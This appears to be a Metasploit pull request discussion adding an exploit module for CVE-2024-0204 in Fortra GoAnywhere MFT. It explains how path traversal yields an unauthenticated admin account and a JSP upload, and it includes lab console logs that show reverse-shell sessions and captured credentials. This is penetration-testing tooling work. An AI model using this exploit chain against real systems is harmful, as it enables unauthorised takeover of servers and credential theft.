RCE exploit module for CVE-2024-0204 in Fortra GoAnywhere MFT

[sfewer-r7]

fixes #18743

This pull request adds an exploit module for CVE-2024-0204 in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

The vulnerability allows an unauthenticated attacker to create a new administrator account via a path traversal vulnerability. We can leverage this to upload a JSP payload and get a session.

The exploit does not delete the account it creates, as you cant delete yourself after you log in, either via the web interface or the REST API.

The check method uses an undocumented unauthenticated REST API endpoint I found which returns the version number of the target system.

The exploit can target either Linux or Windows, and has a default target of Automatic which will determine both the targets OS and product install location (for the payload upload) at run time.

The exploit uses the FileDropper mixin to register dropped file locations, so they can be deleted once a session is created. This has shown mixed results in practice, some files seem to be locked and cannot be deleted (you get a warning if this happens which is useful feedback IMHO).

Example

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options 

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
                                         sploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.100.1.10      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit

[*] Started reverse TCP handler on 10.100.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: uchvkpgt:ZindpxggDdvtrxu3
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/
[*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
exit
[*] 10.100.1.30 - Command shell session 1 closed.
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >

[smcintyre-r7]

Would you mind adding these credentials to the crdentials database so they are stored?

[sfewer-r7]

I added commit b259c5d to address this, works as follows when I tested it:

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit

[*] Started reverse TCP handler on 10.100.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: arhzdfmu:KwHjI4HtYPJueyM8. Note: This account will not be deleted by the module.
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/2xgr59m6.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/
[*] Command shell session 1 opened (10.100.1.10:4444 -> 10.100.1.30:42662) at 2024-02-01 19:49:34 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
pwd
/opt/HelpSystems/GoAnywhere
exit
[*] 10.100.1.30 - Command shell session 1 closed.
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host         origin       service                                    public    private           realm  private_type  JtR Format  cracked_password
----         ------       -------                                    ------    -------           -----  ------------  ----------  ----------------
10.100.1.30  10.100.1.30  8001/tcp (GoAnywhere MFT Admin Interface)  arhzdfmu  KwHjI4HtYPJueyM8         Password                  

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >

I also ran the exploit with msfconsole and no database attached, and the exploit works as expected (and no credentials are stored).

I have not used the Report mixin before so would appreciate if this commit could be double checked to ensure I am using the credentials reporting correctly.

[jheysel-r7]

Looks great Stephen, I tested the store_credentials method in isolation (thank you Spencer for that suggestion) just to be certain and everything is working as expected 👍

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host       origin     service                                    public   private      realm  private_type  JtR Format  cracked_password
----       ------     -------                                    ------   -------      -----  ------------  ----------  ----------------
127.0.0.1  127.0.0.1  8001/tcp (GoAnywhere MFT Admin Interface)  jheysel  SuperSecret         Password

[jheysel-r7]

Release Notes

This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.